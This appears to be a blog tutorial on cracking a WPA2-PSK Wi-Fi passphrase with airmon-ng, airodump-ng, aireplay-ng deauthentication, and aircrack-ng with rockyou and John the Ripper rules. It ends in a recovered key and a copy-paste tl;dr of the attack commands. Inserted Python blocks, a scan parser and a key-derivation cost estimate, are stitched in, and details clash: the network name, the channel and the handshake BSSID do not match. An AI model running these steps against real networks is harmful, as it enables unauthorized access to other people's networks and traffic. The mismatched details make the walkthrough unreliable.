If you want to read up on virtual consoles, see my post linked in this sentence.
tl;dr is posted at the bottom (for those of you just wanting the commands)
Now the fun stuff:
ONE: Find your wireless interface
airmon-ng
This will list the available wireless interfaces that can be put into monitor mode.
TWO: Put it into “monitoring” mode
airmon-ng start wlan0
If you get a warning about processes that could interfere, try the next step first. If the next step fails, kill the listed processes. Personally, I used Virtual Terminals 1-3 and killed everything with prejudice. You don’t have to do this, it just made me feel cool.
My monitoring interface was named wlan0mon.
THREE: Monitor to grab a BSSID and channel.
airodump-ng wlan0mon
You’ll see some output like this:
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
24:A0:55:72:22:46  -56     1154     2971    0   9  54e  WPA2 CCMP   PSK  haxor_me
20:22:20:F2:FA:EE  -76      712       75    0   6  54e  WPA2 CCMP   PSK  prettyflyforawifi
My home network is pentest_me, with a BSSID of 24:A0:55:72:22:46
Please make sure this is your intended and authorized target.
FOUR: Start capturing
airodump-ng -c 9 --bssid 24:A0:55:72:22:46 -w ~/wireless/haxor_me wlan0mon
Broken down: airodump-ng -c CHANNEL --bssid BSSID -w OUTPUT_PREFIX INTERFACE. Note that -w takes a file prefix rather than a folder: airodump-ng writes OUTPUT_PREFIX-01.cap (and the matching .csv files) next to it.
You will get a screen that looks something like this:
CH 6 ][ Elapsed: 6 mins ][ 2015-11-27 00:28
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
24:A0:55:72:22:46  -74 100     3154      292    0   9  54e  WPA2 CCMP   PSK  haxor_me
BSSID              STATION            PWR   Rate    Lost    Frames  Probe
24:A0:55:72:22:46  88:63:D1:C4:11:D2   -1    1e- 0      0       7
This should create four files. Don’t exit this screen! It needs to keep running so your capture keeps growing. You will run aircrack-ng on those files, but first you need to:
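The airodump-ng table above is easy to read by eye, but during an authorized assessment you usually want it as structured data so you can report what is on the air. The following parser is an added example written for this post (it is not code from the post or from the aircrack-ng project). It reads rows in the column layout shown above, skips header and station lines, and flags the networks an audit should call out first: open, WEP, or WPA with TKIP. The sample rows are constructed; the two WPA2 rows mirror the post's output, and the OPN, WEP and TKIP rows are made up to exercise the cases where the CIPHER and AUTH columns are blank.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample of an airodump-ng access-point table (not a real capture).
# The OPN row has no CIPHER/AUTH values, the WEP row has no AUTH value: both are
# real layouts airodump-ng produces and both must parse.
SAMPLE = """\
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 24:A0:55:72:22:46  -56     1154     2971    0   9  54e  WPA2 CCMP   PSK  haxor_me
 20:22:20:F2:FA:EE  -76      712       75    0   6  54e  WPA2 CCMP   PSK  prettyflyforawifi
 00:11:22:33:44:55  -80       40        3    0  11  54e. OPN              CoffeeGuest
 66:77:88:99:AA:BB  -82       15        0    0   1  54   WEP  WEP         LegacyPrinter
 AA:BB:CC:DD:EE:FF  -70      300       12    0   3  54e  WPA  TKIP   PSK  OldRouter
"""

MAC = r"(?:[0-9A-F]{2}:){5}[0-9A-F]{2}"

# One access-point row. CIPHER and AUTH are optional because airodump-ng leaves
# them blank for open networks (and AUTH blank for WEP).
AP_ROW = re.compile(
    rf"^\s*(?P<bssid>{MAC})\s+(?P<pwr>-?\d+)\s+(?P<beacons>\d+)\s+(?P<data>\d+)\s+(?P<per_s>\d+)\s+"
    rf"(?P<ch>\d+)\s+(?P<mb>\S+)\s+(?P<enc>OPN|WEP|WPA\d?)"
    r"(?:\s+(?P<cipher>CCMP TKIP|CCMP|TKIP|GCMP|WEP))?"
    r"(?:\s+(?P<auth>PSK|MGT|SAE|OPN))?"
    r"\s+(?P<essid>.*?)\s*$"
)


@dataclass
class AccessPoint:
    bssid: str
    power: int
    beacons: int
    data: int
    channel: int
    enc: str
    cipher: Optional[str]
    auth: Optional[str]
    essid: str


def parse_airodump(text: str) -> List[AccessPoint]:
    """Parse the access-point section of airodump-ng's screen output."""
    aps: List[AccessPoint] = []
    for line in text.splitlines():
        m = AP_ROW.match(line)
        if not m:  # header line, blank line, or a station row: not an AP row
            continue
        aps.append(AccessPoint(
            bssid=m["bssid"], power=int(m["pwr"]), beacons=int(m["beacons"]),
            data=int(m["data"]), channel=int(m["ch"]), enc=m["enc"],
            cipher=m["cipher"], auth=m["auth"], essid=m["essid"],
        ))
    return aps


def weak_networks(aps: List[AccessPoint]) -> List[AccessPoint]:
    """Networks an audit report should lead with: open, WEP, or WPA using TKIP."""
    return [ap for ap in aps if ap.enc in ("OPN", "WEP") or ap.cipher == "TKIP"]


if __name__ == "__main__":
    parsed = parse_airodump(SAMPLE)
    for ap in parsed:
        print(f"{ap.bssid}  ch{ap.channel:<3}{ap.enc:5}{ap.cipher or '-':5}{ap.auth or '-':4} {ap.essid}")
    print("weak:", [ap.essid for ap in weak_networks(parsed)])
```

The regex is anchored to the column order airodump-ng prints, so it is deliberately strict: a line that does not match is dropped rather than half-parsed, which is the behaviour you want when feeding a report. If you save the run with -w, the same information is also written as a .csv file, which is the better input for anything beyond a quick look.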
FIVE: Capture an authentication handshake.
aireplay-ng -0 1 -a 24:A0:55:72:22:46 -c 88:63:D1:C4:11:D2 wlan0mon
Broken down: -0 means deauth; the number that follows is how many deauth packets to send to the client. I only need one handshake, so I chose one.
-a is for the router's BSSID. This is the same BSSID you used with airodump-ng.
-c is for the client's MAC address. Client MAC addresses show up in the terminal/window where your capture is running.
In the capturing window, clients (or stations) show up in the bottom portion of the window. You want the MAC address from the STATION column.
Once you send the deauth (or you can wait patiently for someone to connect normally), you should hopefully see this in the top right corner of your capture window:
CH 6 ][ Elapsed: 16 mins ][ 2015-11-27 00:39 ] [ WPA Handshake: A8:24:45:C8:08:54
That WPA Handshake bit is what you're looking for. As soon as you get it you can shut down the capture and start cracking.
SIX: Get cracking!
aircrack-ng -a2 -b 24:A0:55:72:22:46 -w /usr/share/wordlists/rockyou.txt ~/wireless/haxor_me*.cap
Broken down:
-a
Force the attack mode, 1 or wep for WEP and 2 or wpa for WPA-PSK.
-b
Select the target network based on the access point MAC address.
-w
Path to a dictionary file for wpa cracking. Specify “-” to use stdin.
The command as I ran it will work through the rockyou wordlist included with Kali and then stop.
That’s all fun and games, but what if we want to do some word-mangling? Well, that line that says ‘Specify “-” to use stdin’ looks like it might pair nicely with this tidbit from the John the Ripper man page:
-stdout[:LENGTH]
When used with a cracking mode, except for “single crack”, makes John print the words it generates to stdout instead of cracking.
While applying wordlist rules, the significant password length is assumed to be LENGTH, or unlimited by default.
To put those together:
john --wordlist=/usr/share/wordlists/rockyou.txt --rules=Single --stdout | aircrack-ng -a2 -b 24:A0:55:72:22:46 -w - ~/wireless/haxor_me*.cap
Yay haxing!
Aircrack-ng 1.2 rc2
[00:00:00] 1600 keys tested (4345.17 k/s)
KEY FOUND! [ snakepit1 ]
Master Key     : E2 CA 4E ED 27 69 4E EE 2C 50 D1 AD AE 02 9D 89
                 4F 3A 39 38 DA 87 72 0E 7E 40 CA 5C F4 32 B7 67
Transient Key  : 42 A0 1F EE 85 AC 06 64 08 57 22 7D 6B 42 0B 46
                 0C F5 FD 91 0F 8C A8 02 E7 85 8C 66 25 FF 66 77
                 A6 E7 C7 7A 73 75 3F E0 82 45 57 FA 5F CB 37 9F
                 E7 7C AA 47 F6 4D A2 33 75 77 A4 EA D4 9A EE 01
EAPOL HMAC     : A1 24 41 C2 08 22 23 A7 E2 F0 C4 1C 11 46 21 C1
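The number worth understanding in that output is the 4345.17 k/s. Every candidate passphrase costs the same fixed amount of work, because WPA2-PSK turns the passphrase into the "Master Key" (the PMK) with PBKDF2-HMAC-SHA1 over the passphrase and SSID at 4096 iterations. The code below is an added example, my own and not from the post or the aircrack-ng project: it derives the PMK the way a client and access point do, checks the derivation against the test vector published in the 802.11 standard, and turns the guess rate from the run above into a worst-case time to exhaust passphrases of an assumed length and alphabet. The passphrase shapes in the main block are assumptions chosen to illustrate the point, not values from the post.

```python
import hashlib

# IEEE 802.11i key derivation: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
# aircrack-ng prints this value as "Master Key" once a candidate verifies against the handshake.
PBKDF2_ITERATIONS = 4096
PMK_LEN = 32

# Test vector from the 802.11 standard: passphrase "password", SSID "IEEE".
IEEE_VECTOR = ("password", "IEEE",
               "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")

# Guess rate reported by aircrack-ng in the run above (keys per second).
CPU_RATE = 4345.17

SECONDS_PER_YEAR = 365 * 24 * 3600


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the Pairwise Master Key from a WPA2-PSK passphrase exactly as a station or AP does."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN)


def keyspace(alphabet_size: int, length: int) -> int:
    """Number of distinct passphrases of exactly `length` characters drawn from the alphabet."""
    return alphabet_size ** length


def years_to_exhaust(alphabet_size: int, length: int, keys_per_second: float = CPU_RATE) -> float:
    """Worst-case time to try every passphrase of that shape at a fixed guess rate."""
    return keyspace(alphabet_size, length) / keys_per_second / SECONDS_PER_YEAR


def self_check() -> bool:
    """True when the derivation reproduces the standard's published test vector."""
    passphrase, ssid, expected_hex = IEEE_VECTOR
    return derive_pmk(passphrase, ssid).hex() == expected_hex


if __name__ == "__main__":
    print("PBKDF2 matches the IEEE test vector:", self_check())
    # Assumed passphrase shapes, to show why a wordlist entry falls quickly while a long
    # random passphrase does not: the per-guess cost is identical, only the keyspace differs.
    for label, alphabet, length in (("8 lowercase letters", 26, 8),
                                    ("12 letters + digits", 62, 12),
                                    ("16 printable ASCII", 95, 16)):
        print(f"{label:22s}: {years_to_exhaust(alphabet, length):.3g} years at {CPU_RATE:,.0f} keys/s")
```

The defender's takeaway: the cost per guess is fixed by the standard, so the only lever the network owner controls is the passphrase's entropy. Anything that appears in a wordlist, with or without mangling rules, is found at wordlist speed no matter how long it is, while a long random passphrase pushes the worst case out by many orders of magnitude even against hardware far faster than the CPU rate shown here.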
tl;dr
airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng -c 9 --bssid 24:A0:55:72:22:46 -w ~/wireless/haxor_me wlan0mon
aireplay-ng -0 1 -a 24:A0:55:72:22:46 -c 88:63:D1:C4:11:D2 wlan0mon
aircrack-ng -a2 -b 24:A0:55:72:22:46 -w /usr/share/wordlists/rockyou.txt ~/wireless/haxor_me*.cap
john --wordlist=/usr/share/wordlists/rockyou.txt --rules=Single --stdout | aircrack-ng -a2 -b 24:A0:55:72:22:46 -w - ~/wireless/haxor_me*.cap